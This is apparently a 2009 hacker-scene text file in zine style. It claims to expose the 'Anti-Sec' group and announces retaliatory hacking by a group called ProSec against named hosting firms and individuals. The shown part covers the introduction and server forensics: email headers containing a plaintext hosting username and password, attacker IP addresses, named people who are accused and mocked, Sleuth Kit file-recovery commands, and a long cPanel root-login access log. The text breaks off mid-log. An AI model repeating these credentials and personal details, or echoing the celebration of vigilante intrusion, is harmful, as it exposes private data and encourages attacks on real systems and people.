__ .__ _____ _____/ |_|__| ______ ____ ____ \__ \ / \ __\ |/ ___// __ \_/ ___\ / __ \| | \ | | |\___ \\ ___/\ \___ (____ /___| /__| |__/____ >\___ >\___ > \/ \/ \/ \/ \/ *no more* get yours http://www.network-science.de/ascii/ [0x00] [Introduction] [0x01] [Forensics] [0x02] [Target Profiling & Lulz] [0x03] [ownage.net - prosec] [0x04] [vitalspeeds - prosec] [0x05] [makosolutions - prosec] [0x06] [holeinthewallhosting - prosec] [0x07] [darkmindz - zf05] [0x08] [Backdoor RCE] [0x09] [SEO Optimizing] [0x10] [Reporting] [0x11] [Attachments] [0x12] [Conclusion] [0x13] [Greetz] _______ _______ _______ \ _ \ ___ __\ _ \ \ _ \ / /_\ \\ \/ / /_\ \/ /_\ \ \ \_/ \> <\ \_/ \ \_/ \ \_____ /__/\_ \\_____ /\_____ / \/ \/ \/ \/ hai:] .___ __ .___ __ .__ | | _____/ |________ ____ __| _/_ __ _____/ |_|__| ____ ____ | |/ \ __\_ __ \/ _ \ / __ | | \_/ ___\ __\ |/ _ \ / \ | | | \ | | | \( <_> ) /_/ | | /\ \___| | | ( <_> ) | \ |___|___| /__| |__| \____/\____ |____/ \___ >__| |__|\____/|___| / \/ \/ \/ \/ What you are about to read is the complete destruction of the "Anti-Sec" group. An organization known as "ProSec" contacted us with reports containing information about the entire group and how it was operating. We don't know who they are, they appear to be well-funded and top notch security experts and what they have done against the group is invaluable to us and others that they have and or would have been targeted. ProSec did want me to portray a message that organizations similar to the Anti-Sec will and are currently being targeted by the movement. ProSec already has access to a number of them and are continuously monitoring and gathering more information about the various groups and will release information when applicable. No longer should whitehats fear these groups, as soon as an individual is targeted, they will target right back. This is a warning shot to those out there that target us. I want to thank ProSec for the work that they continue to do and understand why this movement is so important to the security community. On the 4th of June 2009, a group named "Anti-Sec" decided to expose Astalavista group after they successfully exploited what was rumored to be a Litespeed 0day exploit which in reality does not exist. After looking up on this more and more, a couple of days later we found out that the responsible person behind this attack was a Saudi-Arabian with the nickname RoMeO, so we decided to let the other Astalavista staff know about our findings. Joao Pontes, one of the senior Astalavista administrators decided to warn his friend RoMeO about it and as you will notice below Joao Pontes (rorkty) knew from the beginning that Astalavista group was compromised by his closest friend and decided to do nothing about it. Later, on the 9th of June one of my dedicated hosting servers, running a couple of websites was targeted by the same "Anti-Sec" group providing fake and misleading information to the public. The reason that we decided to start looking into this subject, was to see how and why my dedicated hosting server was compromised despite the fact that it was secure enough to provide access to the outside world. Below is a list of some security measures that had been taken to ensure no unauthorized access permitted: 1) Firewall Protection 2) Brute Force Detection and Prevention 3) Kernel Hardening 4) Apache, PHP, SQL Hardening 5) SSH Hardening 6) Wheel access group for su 7) Chrooted Jail Shell 8) Web Application Firewall 9) Network Intrusion Detection 10) Host Intrustion Detection 11) Hidden daemon versions 12) Rootkit Detection 13) DoS Protection 14) All private sites hosted, audited for bugs 15) Root Access Alert 16) Etc Unfortunately the interval between compromisation of the server until the alert reports came to our attention was not enough to prevent the attack. After our research and the information provided by the ProSec group we came to the conclusion that the server was either hit by an 0day exploit or through my dedicated server provider makosolutions.com which later on it shows that they were backdoored. Utilizing passive and active reconnaissance methods resulted to large information acquisitions which provided us with means for linking together certain information and shade more light on who we are about to target and research for the attacks that took place under the "Anti-Sec" label. In this log file you will read a limited version of the information gathered and provided, since the most important parts are being kept private in order to be analyzed by the proper authorities. _______ _______ ____ \ _ \ ___ __\ _ \/_ | / /_\ \\ \/ / /_\ \| | \ \_/ \> <\ \_/ \ | \_____ /__/\_ \\_____ /___| \/ \/ \/ ___________ .__ \_ _____/__________ ____ ____ _____|__| ____ ______ | __)/ _ \_ __ \_/ __ \ / \ / ___/ |/ ___\ / ___/ | \( <_> ) | \/\ ___/| | \\___ \| \ \___ \___ \ \___ / \____/|__| \___ >___| /____ >__|\___ >____ > \/ \/ \/ \/ \/ \/ Email Incidents Delivered-To: glafkos@gmail.com Received: by 10.223.104.212 with SMTP id q20cs268734fao; Tue, 9 Jun 2009 03:58:03 -0700 (PDT) Received: by 10.223.113.68 with SMTP id z4mr5075866fap.72.1244545083200; Tue, 09 Jun 2009 03:58:03 -0700 (PDT) Return-Path: Received: from freehostia.com ([66.40.52.21]) by mx.google.com with ESMTP id 27si6598826fxm.93.2009.06.09.03.58.02; Tue, 09 Jun 2009 03:58:03 -0700 (PDT) Received-SPF: neutral (google.com: 66.40.52.21 is neither permitted nor denied by best guess record for domain of root@freehostia.com) client-ip=66.40.52.21; Authentication-Results: mx.google.com; spf=neutral (google.com: 66.40.52.21 is neither permitted nor denied by best guess record for domain of root@freehostia.com) smtp.mail=root@freehostia.com Received: from root by freehostia.com with local (Exim 4.63) (envelope-from ) id 1MDz3p-0002ME-UX for glafkos@gmail.com; Tue, 09 Jun 2009 11:00:09 +0000 To: glafkos@gmail.com Subject: Hosting account: Password reminder MIME-Version: 1.0 Content-type: text/plain; charset=UTF-8 From: Free Hostia Cc: Reply-To: Message-Id: Date: Tue, 09 Jun 2009 11:00:09 +0000 Dear Glask Chwat, at 2009-06-09 10:53:25 someone from this IP: 188.51.89.109 has requested your current password for the Control Panel. We are sending you your account login details: username: glachw password: 1779586 If you have any questions, please open a new support ticket from the Help section of the Control Panel. Best Regards, Free Hostia Team /* Clearly the moron didn't think about using any kind of proxy, or maybe he just couldn't figure out how to use Tor? As you can see above, he made this request from his home IP. */ Delivered-To: glafkos@gmail.com Received: by 10.223.104.212 with SMTP id q20cs272895fao; Tue, 9 Jun 2009 05:26:34 -0700 (PDT) MIME-Version: 1.0 Received: by 10.216.52.194 with SMTP id e44mr23160wec.34.1244550394375; Tue, 09 Jun 2009 05:26:34 -0700 (PDT) Date: Tue, 9 Jun 2009 15:26:34 +0300 Message-ID: <94a72b260906090526o1aaa5008o86ebfcaa5cc398c2@mail.gmail.com> Subject: Lol. From: james knuth To: glafkos@gmail.com Content-Type: multipart/alternative; boundary=0016e6de1524296ff7046be97868 http://pastebin.com/m592e1f1c It will be all over the net soon, Enjoy. // Indeed.. Server Forensics root@srv01 [/home/recovery]# du -h --max-depth=1 608K ./APF_Backup 992K ./Diff 224K ./Latest 3.3M ./LinkNet 46M ./log 1.2M ./modbin 7.5G ./sdb2recover 361M ./sdb3recover 371M ./sdb5recover 121M ./Software 128K ./OpenSSH_Debug 4.5G ./Evidence 15G . root@srv01 [/home/recovery]# // Obviously this noobcake didn't know that it was possible to recover deleted files root@srv01 [/home/recovery]# du -h --max-depth=0 sdb* string* 416K sdb2output.txt 7.5G sdb2recover 361M sdb3recover 7.9M sdb3usrdirlist.txt 371M sdb5recover 22M sdb5tmp.txt 64K sdb8deleted_files.txt 2.5M sdb8home.txt 857M stringfile_sdb2.txt root@srv01 [/home/recovery]# root@srv01 [/home/recovery]# ls -lad sd*recover drwxr-xr-x 17 root root 32768 Jun 15 16:26 sdb2recover drwxr-xr-x 10 root root 32768 Jun 15 18:09 sdb3recover drwxr-xr-x 4 root root 32768 Jun 15 22:59 sdb5recover root@srv01 [/home/recovery]# root@srv01 [/home/recovery]# ./fls -a -r -p /dev/sdb3 > sdb3usrdirlist.txt root@srv01 [/home/recovery]# grep -i "access_log" /home/recovery/sdb3usrdirlist.txt r/r 2195490: local/cpanel/logs/access_log r/r * 2199010(realloc): local/cpanel/logs/access_log-cpanelsync r/r 2362208: local/apache/logs/access_log root@srv01 [/home/recovery]# ./icat -r -s -f ext3 /dev/sdb3 2195490 > /tmp/access_log root@srv01 [/home/recovery]# ls -la /tmp/access_log -rw-r--r-- 1 root root 13312000 Jun 11 03:38 /tmp/access_log root@srv01 [/home/recovery]# // Someone needs to learn how to cover his tracks... try... "man dd" root@srv01 [/home/recovery]# cat /tmp/access_log | grep 188.54 188.54.114.181 - - [06/08/2009:10:59:52 -0000] "GET / HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:10:59:59 -0000] "GET /unprotected/cpanel/style.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:11:00:01 -0000] "GET /unprotected/cpanel/images/log_02b.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:11:00:01 -0000] "GET /unprotected/cpanel/images/button-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/images/log_03.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/favicon.ico HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/images/log_01_webmail.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 301 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - glafkos@infosec.org.uk [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 401 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:08 -0000] "GET /favicon.ico HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:08 -0000] "GET / HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:12 -0000] "GET /unprotected/cpanel/style.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:13 -0000] "GET /unprotected/cpanel/images/log_02b.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:13 -0000] "GET /unprotected/cpanel/images/log_03.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:14 -0000] "GET /unprotected/cpanel/images/button-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:14 -0000] "GET /unprotected/cpanel/images/log_01_whm.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:16 -0000] "GET /unprotected/cpanel/favicon.ico HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:27 -0000] "GET /unprotected/cpanel/images/button-bg-over.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:29 -0000] "POST /login/ HTTP/1.1" 301 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:32 -0000] "GET / HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command?PFILE=topframe.html HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command?PFILE=main HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994913/combined_optimized.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994907/themes/x/style_optimized.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994905/themes/x/logo.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1192071000/lock.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/serverconfig.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/support.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1231994880/js/hidecells.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/networksetup.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/security.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/servercontacts.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/resellers.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/languages.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/backup.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/transfers.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/systemreboot.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/serverstatus.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/account-info.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/account-functions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1231994900/themes/x/icons/functions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/frontpage.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/themes.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/packages.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/dnsfunctions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/sql.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/ipfunctions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/diskdrives.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/software.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/email.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/health.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1231994900/yui/utilities/utilities.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/cpanel.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/ssl.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/restartservices.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1143069318/minus.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1186549335/themes/x/images/arrow-up.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1181098613/themes/x/header-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994907/themes/x/style_optimized.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1192071000/themes/x/breadcrumb_bg.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994907/themes/x/style_optimized.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1181098615/images/button-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994907/themes/x/style_optimized.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/topframe/bgtd.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" 